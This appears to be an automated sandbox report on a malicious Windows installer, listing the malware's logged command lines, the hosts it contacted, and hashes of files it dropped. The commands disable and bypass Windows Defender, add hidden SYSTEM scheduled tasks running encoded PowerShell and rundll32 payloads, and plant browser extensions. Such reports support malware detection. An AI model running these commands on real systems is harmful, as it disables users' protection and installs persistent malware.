"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gzQJjWLsT" /SC once /ST 03:00:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gzQJjWLsT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gzQJjWLsT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 05:36:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe\" F0 /bnsite_idsLW 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aUYdFpynDtMaquqaO"

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe F0 /bnsite_idsLW 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\ddutGR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\CAwHQVp.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\Sxxhlmi.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\ZAcQvcK.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\yMucUOn.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\AUIHvKh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 16:16:36 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\EoGhlcSG\dZbEfvp.dll\",#1 /ppsite_idnBO 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YGcJOiVocZfwUgdee"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\EoGhlcSG\dZbEfvp.dll",#1 /ppsite_idnBO 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\EoGhlcSG\dZbEfvp.dll",#1 /ppsite_idnBO 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 28.143.109.104.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 74.185.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.18.217.172.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 46.206.58.216.in-addr.arpa udp
US 8.8.8.8:53 65.186.250.142.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 api3.check-data.xyz udp
US 44.240.147.44:80 api3.check-data.xyz tcp
US 8.8.8.8:53 44.147.240.44.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe

MD5 6248fde83e7929ff0561fd033b68d11c
SHA1 2ad27e8ca39e8717981c1ed451cbddcef1a8334c
SHA256 66959c9da38234dc5a24b2771036a50b47ec531c1bb0cdf7383952c6a6ccb884
SHA512 80bcb48b79563e92880f2d458f4d8f0ea95ba6319054ebc9559b76e108ca76da9d37e259635a1f727084741e2bfb13a9f93c0b5dbe1aaf720d652ea0165a3f33

memory/4872-8-0x00000000005C0000-0x0000000000C7E000-memory.dmp

memory/4872-9-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/4824-13-0x0000000072EE0000-0x0000000073690000-memory.dmp

memory/4824-12-0x0000000002560000-0x0000000002596000-memory.dmp

memory/4824-14-0x00000000025B0000-0x00000000025C0000-memory.dmp

memory/4824-15-0x0000000004D20000-0x0000000005348000-memory.dmp

memory/4824-16-0x0000000004B50000-0x0000000004B72000-memory.dmp

memory/4824-17-0x0000000005350000-0x00000000053B6000-memory.dmp

memory/4824-23-0x00000000054C0000-0x0000000005526000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gndvqefr.fz4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4824-28-0x0000000005630000-0x0000000005984000-memory.dmp

memory/4824-29-0x0000000005AF0000-0x0000000005B0E000-memory.dmp

memory/4824-30-0x0000000005B40000-0x0000000005B8C000-memory.dmp

memory/4824-33-0x0000000072EE0000-0x0000000073690000-memory.dmp

memory/4872-37-0x00000000005C0000-0x0000000000C7E000-memory.dmp

memory/3492-39-0x00000000006A0000-0x0000000000D5E000-memory.dmp

memory/3492-40-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/1960-43-0x0000000072EB0000-0x0000000073660000-memory.dmp

memory/1960-44-0x0000000003E70000-0x0000000003E80000-memory.dmp

memory/1960-54-0x0000000004E20000-0x0000000005174000-memory.dmp

memory/1960-55-0x0000000005960000-0x00000000059AC000-memory.dmp

memory/1960-58-0x0000000072EB0000-0x0000000073660000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/3220-60-0x0000000072EB0000-0x0000000073660000-memory.dmp

memory/3220-61-0x0000000001A20000-0x0000000001A30000-memory.dmp

memory/3220-62-0x0000000001A20000-0x0000000001A30000-memory.dmp

memory/3220-72-0x0000000004FD0000-0x0000000005324000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 629cb3c3855572b166a5ac864c82af6b
SHA1 da398c2668624be9a3d34d343e966ad81c5cb0d0
SHA256 4ae3455bf9816e9b4c0f0f82efaf9c6ad15daa9997a082b2d5a02433b0581df2
SHA512 edce2eab537424ca28b6d7d38476e4df503517366b5e8e1adf3b79419105044ed58d551f4bd0aa37199ba2e1e99cf4dc9db0815903e50b86dedab7c9569c160a

memory/3220-75-0x0000000072EB0000-0x0000000073660000-memory.dmp

memory/928-78-0x00007FFABE1E0000-0x00007FFABECA1000-memory.dmp

memory/928-79-0x0000020727820000-0x0000020727842000-memory.dmp

memory/928-89-0x0000020727860000-0x0000020727870000-memory.dmp

memory/928-90-0x0000020727860000-0x0000020727870000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6bf54869c29d2fc8c17ab9a130c8b341
SHA1 4f65af0e570c177cda1589b40773666e4d4bacc2
SHA256 21c02402d637d3add7ad4ad3c88ebe5b47276f41ed709734093178bdcc28db0d
SHA512 e4d533cd4c28cb0d8c772a429cfeba6dc57b870eefcda3af2ce74ba8f830afefccfe071a4b236c2389e9191a4417c2b56331d5c35508d8b8b509bd9afe639e17

memory/928-94-0x00007FFABE1E0000-0x00007FFABECA1000-memory.dmp

memory/3492-95-0x00000000006A0000-0x0000000000D5E000-memory.dmp

memory/5028-100-0x0000000000140000-0x00000000007FE000-memory.dmp

memory/3492-101-0x00000000006A0000-0x0000000000D5E000-memory.dmp

memory/5028-102-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/5028-113-0x00000000024E0000-0x0000000002565000-memory.dmp

memory/3152-115-0x0000000072C20000-0x00000000733D0000-memory.dmp

memory/3152-117-0x0000000001260000-0x0000000001270000-memory.dmp

memory/3152-138-0x00000000042A0000-0x00000000045F4000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e85d6f0f9b8ed8d67ac5b010cbf3817f
SHA1 35379c9f316f3da808bd623a77ba42eeca315752
SHA256 5031fbae1368d4189be03bb05b386f9eaf87bfcdb8b39df6ca17c0fb5899d901
SHA512 032a1b11afdfbf85a6b4ac435129ec2354ff6331759daedfcc1bec6aac2d4d2f77a378936f8dfd64e78d20c76649b7ef2da802b96c1fd14f0ff3a656054c4a9c

memory/3152-150-0x0000000004940000-0x000000000498C000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 93d4364b35d5ee4bb0a5f849d756e254
SHA1 11fd1a7505ba05b08f39825a01b6824e37c64631
SHA256 1ff8106f4b258dd8b6b8eca7dea74f5f8faded77e56382610da2965e54499f2c
SHA512 025c319781eab6e241e20326ab359c4d1fb2d977da09acbc96bc8b67e5daa7fd10b356642c11a8dc12340c2784110ff76f6b5e0610459d1de175e39101d4d3ab

memory/3152-163-0x0000000072C20000-0x00000000733D0000-memory.dmp

memory/5028-171-0x0000000002C30000-0x0000000002C94000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
